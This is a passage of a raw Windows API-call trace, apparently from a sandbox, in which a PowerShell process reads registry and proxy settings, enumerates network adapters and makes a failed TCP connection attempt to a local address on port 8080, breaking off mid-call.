lpType=0x653ef8d9a8*=0x1, lpData=0x0, lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.009] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8d9a8, lpData=0x25b5c299730, lpcbData=0x653ef8d9a0*=0x56 | out: lpType=0x653ef8d9a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8d9a0*=0x56) returned 0x0 [0234.009] RegCloseKey (hKey=0x6f4) returned 0x0 [0234.009] EtwEventActivityIdControl () returned 0x0 [0234.009] EtwEventActivityIdControl () returned 0x0 [0234.009] SetEvent (hEvent=0x83c) returned 1 [0234.009] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8dd60*=0x83c, lpdwindex=0x653ef8db34 | out: lpdwindex=0x653ef8db34) returned 0x0 [0234.010] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe380 [0234.010] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfe380, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.010] CoTaskMemFree (pv=0x25b73cfe380) [0234.012] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0234.012] GetFileType (hFile=0x28) returned 0x2 [0234.014] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8e048 | out: lpConsoleScreenBufferInfo=0x653ef8e048) returned 1 [0234.015] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8e048 | out: lpConsoleScreenBufferInfo=0x653ef8e048) returned 1 [0234.092] EtwEventActivityIdControl () returned 0x0 [0234.093] EtwEventActivityIdControl () returned 0x0 [0234.093] EtwEventActivityIdControl () returned 0x0 [0234.261] EtwEventActivityIdControl () returned 0x0 [0236.740] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6f4 [0236.741] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7fc [0236.755] GetCurrentProcess () returned 0xffffffffffffffff [0236.755] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dfc8 | out: TokenHandle=0x653ef8dfc8*=0x7dc) returned 1 [0236.759] GetCurrentProcess () returned 0xffffffffffffffff [0236.759] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dfd8 | out: TokenHandle=0x653ef8dfd8*=0x7f0) returned 1 [0236.773] GetCurrentProcess () returned 0xffffffffffffffff [0236.773] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8e4d8 | out: TokenHandle=0x653ef8e4d8*=0x7f4) returned 1 [0236.790] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8c4b8 | out: phkResult=0x653ef8c4b8*=0x7f8) returned 0x0 [0236.791] RegQueryValueExW (in: hKey=0x7f8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x653ef8c508, lpData=0x0, lpcbData=0x653ef8c500*=0x0 | out: lpType=0x653ef8c508*=0x1, lpData=0x0, lpcbData=0x653ef8c500*=0xe) returned 0x0 [0236.791] RegQueryValueExW (in: hKey=0x7f8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x653ef8c508, lpData=0x25b5beec588, lpcbData=0x653ef8c500*=0xe | out: lpType=0x653ef8c508*=0x1, lpData="Client", lpcbData=0x653ef8c500*=0xe) returned 0x0 [0236.791] RegCloseKey (hKey=0x7f8) returned 0x0 [0236.893] CoTaskMemAlloc (cb=0xcd0) returned 0x25b598901d0 [0236.896] RasEnumConnectionsW (in: param_1=0x25b598901d0, param_2=0x653ef8e480, param_3=0x653ef8e488 | out: param_1=0x25b598901d0, param_2=0x653ef8e480, param_3=0x653ef8e488) returned 0x0 [0236.977] CoTaskMemFree (pv=0x25b598901d0) [0236.985] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x653ef8e1c8 | out: lpWSAData=0x653ef8e1c8) returned 0 [0236.999] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x86c [0237.090] setsockopt (s=0x86c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0237.090] closesocket (s=0x86c) returned 0 [0237.106] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x86c [0237.108] setsockopt (s=0x86c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0237.108] closesocket (s=0x86c) returned 0 [0237.111] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x86c [0237.114] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x858 [0237.117] ioctlsocket (in: s=0x86c, cmd=-2147195266, argp=0x653ef8e4a8 | out: argp=0x653ef8e4a8) returned 0 [0237.117] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x870 [0237.117] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x84c [0237.117] ioctlsocket (in: s=0x870, cmd=-2147195266, argp=0x653ef8e4a8 | out: argp=0x653ef8e4a8) returned 0 [0237.119] WSAIoctl (in: s=0x86c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x653ef8e430, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x653ef8e430, lpOverlapped=0x0) returned -1 [0237.121] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x653ef8e010, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0237.127] WSAEventSelect (s=0x86c, hEventObject=0x858, lNetworkEvents=512) returned 0 [0237.128] WSAIoctl (in: s=0x870, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x653ef8e430, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x653ef8e430, lpOverlapped=0x0) returned -1 [0237.128] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x653ef8e010, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0237.128] WSAEventSelect (s=0x870, hEventObject=0x84c, lNetworkEvents=512) returned 0 [0237.128] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x878 [0237.129] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x878, param_3=0x3) returned 0x0 [0237.140] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x653ef8e518 | out: phkResult=0x653ef8e518*=0x88c) returned 0x0 [0237.141] RegOpenKeyExW (in: hKey=0x88c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8e458 | out: phkResult=0x653ef8e458*=0x890) returned 0x0 [0237.141] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x894 [0237.141] RegNotifyChangeKeyValue (hKey=0x890, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x894, fAsynchronous=1) returned 0x0 [0237.159] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8e460 | out: phkResult=0x653ef8e460*=0x8a4) returned 0x0 [0237.159] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8a8 [0237.159] RegNotifyChangeKeyValue (hKey=0x8a4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x8a8, fAsynchronous=1) returned 0x0 [0237.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8e460 | out: phkResult=0x653ef8e460*=0x8ac) returned 0x0 [0237.160] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8b0 [0237.160] RegNotifyChangeKeyValue (hKey=0x8ac, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x8b0, fAsynchronous=1) returned 0x0 [0237.160] GetCurrentProcess () returned 0xffffffffffffffff [0237.160] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8e3e8 | out: TokenHandle=0x653ef8e3e8*=0x8b4) returned 1 [0237.164] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d518 | out: phkResult=0x653ef8d518*=0x8b8) returned 0x0 [0237.167] RegQueryValueExW (in: hKey=0x8b8, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x653ef8d558, lpData=0x0, lpcbData=0x653ef8d550*=0x0 | out: lpType=0x653ef8d558*=0x0, lpData=0x0, lpcbData=0x653ef8d550*=0x0) returned 0x2 [0237.167] RegCloseKey (hKey=0x8b8) returned 0x0 [0237.228] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x25b73cfbb20 [0237.268] WinHttpSetTimeouts (hInternet=0x25b73cfbb20, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0237.271] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x653ef8e460 | out: pProxyConfig=0x653ef8e460) returned 1 [0237.764] SystemFunction041 (in: Memory=0x25b73c222a8, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x25b73c222a8) returned 0x0 [0239.240] CoCreateGuid (in: pguid=0x653ef8e638 | out: pguid=0x653ef8e638*(Data1=0x88a6a88, Data2=0xc566, Data3=0x4507, Data4=([0]=0x9a, [1]=0x46, [2]=0x10, [3]=0x28, [4]=0xc0, [5]=0x8a, [6]=0xe2, [7]=0x53))) returned 0x0 [0239.847] GetCurrentProcess () returned 0xffffffffffffffff [0239.847] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dd58 | out: TokenHandle=0x653ef8dd58*=0x8f0) returned 1 [0239.854] GetCurrentProcess () returned 0xffffffffffffffff [0239.854] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dd68 | out: TokenHandle=0x653ef8dd68*=0x8f4) returned 1 [0239.867] QueryPerformanceFrequency (in: lpFrequency=0x7fff732e4ff8 | out: lpFrequency=0x7fff732e4ff8*=100000000) returned 1 [0239.867] QueryPerformanceCounter (in: lpPerformanceCount=0x653ef8e418 | out: lpPerformanceCount=0x653ef8e418*=3484063762071) returned 1 [0239.877] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0239.877] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0239.878] CoTaskMemFree (pv=0x25b73cfa3c0) [0239.878] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0239.878] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0239.878] CoTaskMemFree (pv=0x25b73d00e00) [0239.882] EtwEventRegister () returned 0x0 [0239.882] EtwEventSetInformation () returned 0x0 [0239.896] GetCurrentProcess () returned 0xffffffffffffffff [0239.896] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dc28 | out: TokenHandle=0x653ef8dc28*=0x8fc) returned 1 [0239.900] GetCurrentProcess () returned 0xffffffffffffffff [0239.900] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dc38 | out: TokenHandle=0x653ef8dc38*=0x900) returned 1 [0239.926] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8df80*=0x878, lpdwindex=0x653ef8dd54 | out: lpdwindex=0x653ef8dd54) returned 0x80010115 [0239.927] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8df30*=0x858, lpdwindex=0x653ef8dd04 | out: lpdwindex=0x653ef8dd04) returned 0x80010115 [0239.928] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8df30*=0x84c, lpdwindex=0x653ef8dd04 | out: lpdwindex=0x653ef8dd04) returned 0x80010115 [0239.928] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8e000*=0x894, lpdwindex=0x653ef8ddd4 | out: lpdwindex=0x653ef8ddd4) returned 0x80010115 [0239.929] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8e000*=0x8a8, lpdwindex=0x653ef8ddd4 | out: lpdwindex=0x653ef8ddd4) returned 0x80010115 [0239.929] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8e000*=0x8b0, lpdwindex=0x653ef8ddd4 | out: lpdwindex=0x653ef8ddd4) returned 0x80010115 [0239.943] GetCurrentProcess () returned 0xffffffffffffffff [0239.943] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8db98 | out: TokenHandle=0x653ef8db98*=0x904) returned 1 [0239.945] GetCurrentProcess () returned 0xffffffffffffffff [0239.945] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dba8 | out: TokenHandle=0x653ef8dba8*=0x908) returned 1 [0239.948] SetEvent (hEvent=0x6f4) returned 1 [0239.962] SetEvent (hEvent=0x6f4) returned 1 [0239.973] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x920 [0239.974] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x924 [0239.974] ioctlsocket (in: s=0x920, cmd=-2147195266, argp=0x653ef8e1b8 | out: argp=0x653ef8e1b8) returned 0 [0239.974] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x928 [0239.974] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x92c [0239.974] ioctlsocket (in: s=0x928, cmd=-2147195266, argp=0x653ef8e1b8 | out: argp=0x653ef8e1b8) returned 0 [0239.974] WSAIoctl (in: s=0x920, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x653ef8e140, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x653ef8e140, lpOverlapped=0x0) returned -1 [0239.975] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x653ef8dd20, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0239.975] WSAEventSelect (s=0x920, hEventObject=0x924, lNetworkEvents=512) returned 0 [0239.975] WSAIoctl (in: s=0x928, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x653ef8e140, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x653ef8e140, lpOverlapped=0x0) returned -1 [0239.975] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x653ef8dd20, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0239.975] WSAEventSelect (s=0x928, hEventObject=0x92c, lNetworkEvents=512) returned 0 [0239.983] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x653ef8e1a8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x653ef8e1a8*=0xc28) returned 0x6f [0239.989] LocalAlloc (uFlags=0x0, uBytes=0xc28) returned 0x25b73ce38b0 [0239.989] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x25b73ce38b0, SizePointer=0x653ef8e1a8*=0xc28 | out: AdapterAddresses=0x25b73ce38b0*(Alignment=0x6000001c0, Length=0x1c0, IfIndex=0x6, Next=0x25b73ce3bd0, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x25b73ce3b20, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x1f, [2]=0x5d, [3]=0xf6, [4]=0x79, [5]=0xab, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid.Value=0x6008002000000, Luid.Info.Reserved=0x6008002000000, Luid.Info.NetLuidIndex=0x6008002000000, Luid.Info.IfType=0x6008002000000, Dhcpv4Server.lpSockaddr=0x25b73ce3a70*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0x653ef8e1a8*=0xc28) returned 0x0 [0240.010] LocalFree (hMem=0x25b73ce38b0) returned 0x0 [0240.022] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe380 [0240.022] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x25b73cfe380, nSize=0x105 | out: lpBuffer="") returned 0x0 [0240.022] CoTaskMemFree (pv=0x25b73cfe380) [0240.022] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0240.022] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0240.022] CoTaskMemFree (pv=0x25b73cfd8e0) [0240.037] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x930 [0240.038] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x934 [0240.041] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8dcb0*=0x924, lpdwindex=0x653ef8da84 | out: lpdwindex=0x653ef8da84) returned 0x80010115 [0240.041] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x653ef8dcb0*=0x92c, lpdwindex=0x653ef8da84 | out: lpdwindex=0x653ef8da84) returned 0x80010115 [0240.045] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8dee8 | out: phkResult=0x653ef8dee8*=0x938) returned 0x0 [0240.045] RegQueryValueExW (in: hKey=0x938, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x653ef8df28, lpData=0x0, lpcbData=0x653ef8df20*=0x0 | out: lpType=0x653ef8df28*=0x0, lpData=0x0, lpcbData=0x653ef8df20*=0x0) returned 0x2 [0240.045] RegCloseKey (hKey=0x938) returned 0x0 [0240.047] WSAConnect (in: s=0x930, name=0x25b5bfb9890*(sa_family=2, sin_port=0x1f90, sin_addr="192.168.1.22"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0261.235] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274c, dwLanguageId=0x0, lpBuffer=0x653ef8dc70, nSize=0x101, Arguments=0x0 | out: lpBuffer="A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.\r\n") returned 0xb9 [0261.310] setsockopt (s=0x930, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0261.310] closesocket (s=0x930) returned 0 [0261.310] setsockopt (s=0x934, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0261.310] closesocket (s=0x934) returned 0 [0261.970] EtwEventActivityIdControl () returned 0x0 [0261.970] EtwEventActivityIdControl () returned 0x0 [0261.970] EtwEventActivityIdControl () returned 0x0 [0262.100] EtwEventActivityIdControl () returned 0x0 [0262.100] EtwEventActivityIdControl () returned 0x0 [0262.101] EtwEventActivityIdControl () returned 0x0 [0262.186] CoCreateGuid (in: pguid=0x653ef83318 | out: pguid=0x653ef83318*(Data1=0xcf4387b7, Data2=0xffd, Data3=0x4a6a, Data4=([0]=0x9b, [1]=0xf5, [2]=0x22, [3]=0xaa, [4]=0x4, [5]=0xf9, [6]=0xc2, [7]=0x73))) returned 0x0 [0264.534] CoCreateGuid (in: pguid=0x653ef83318 | out: pguid=0x653ef83318*(Data1=0x5c1aa21f, Data2=0x3a83, Data3=0x4dc3, Data4=([0]=0x8f, [1]=0x1d, [2]=0x25, [3]=0x12, [4]=0x40, [5]=0xc4, [6]=0xa0, [7]=0xba))) returned 0x0 [0266.052] CoCreateGuid (in: pguid=0x653ef82af8 | out: pguid=0x653ef82af8*(Data1=0x485c56ab, Data2=0x8719, Data3=0x4b3e, Data4=([0]=0x9e, [1]=0x1e, [2]=0xad, [3]=0xf9, [4]=0x12, [5]=0x9c, [6]=0x92, [7]=0xf2))) returned 0x0 [0266.068] EtwEventActivityIdControl () returned 0x0 [0266.068] EtwEventActivityIdControl () returned 0x0 [0266.068] EtwEventActivityIdControl () returned 0x0 [0266.069] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0266.069] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0266.069] CoTaskMemFree (pv=0x25b73cfe7c0) [0266.139] EtwEventActivityIdControl () returned 0x0 [0266.139] EtwEventActivityIdControl () returned 0x0 [0266.139] EtwEventActivityIdControl () returned 0x0 [0266.185] EtwEventActivityIdControl () returned 0x0 [0266.476] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7f0 [0266.477] CoCreateGuid (in: pguid=0x653ef81d78 | out: pguid=0x653ef81d78*(Data1=0x32986edc, Data2=0x4b03, Data3=0x47f6, Data4=([0]=0xaf, [1]=0x57, [2]=0x52, [3]=0xe0, [4]=0x33, [5]=0xb3, [6]=0x61, [7]=0xdc))) returned 0x0 [0266.507] EtwEventActivityIdControl () returned 0x0 [0266.507] EtwEventActivityIdControl () returned 0x0 [0266.507] EtwEventActivityIdControl () returned 0x0 [0266.507] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0266.507] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0266.507] CoTaskMemFree (pv=0x25b73cfa800) [0266.508] EtwEventActivityIdControl () returned 0x0 [0266.508] EtwEventActivityIdControl () returned 0x0 [0266.508] EtwEventActivityIdControl () returned 0x0 [0266.509] EtwEventActivityIdControl () returned 0x0 [0268.137] EtwEventActivityIdControl () returned 0x0 [0268.137] EtwEventActivityIdControl () returned 0x0 [0268.137] EtwEventActivityIdControl () returned 0x0 [0268.137] EtwEventActivityIdControl () returned 0x0 [0270.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef82ab8 | out: lpConsoleScreenBufferInfo=0x653ef82ab8) returned 1 [0271.307] CoCreateGuid (in: pguid=0x653ef82af8 | out: pguid=0x653ef82af8*(Data1=0x7117d57a, Data2=0x960, Data3=0x42c0, Data4=([0]=0x9d, [1]=0x2, [2]=0xd5, [3]=0x73, [4]=0xbc, [5]=0xd2, [6]=0xe8, [7]=0x23))) returned 0x0 [0271.324] EtwEventActivityIdControl () returned 0x0 [0271.324] EtwEventActivityIdControl () returned 0x0 [0271.324] EtwEventActivityIdControl () returned 0x0 [0271.325] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0271.325] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0271.325] CoTaskMemFree (pv=0x25b73cfa800) [0271.325] EtwEventActivityIdControl () returned 0x0 [0271.325] EtwEventActivityIdControl () returned 0x0 [0271.325] EtwEventActivityIdControl () returned 0x0 [0271.326] EtwEventActivityIdControl () returned 0x0 [0271.515] EtwEventActivityIdControl () returned 0x0 [0271.515] EtwEventActivityIdControl () returned 0x0 [0272.469] CoCreateGuid (in: pguid=0x653ef82af8 | out: 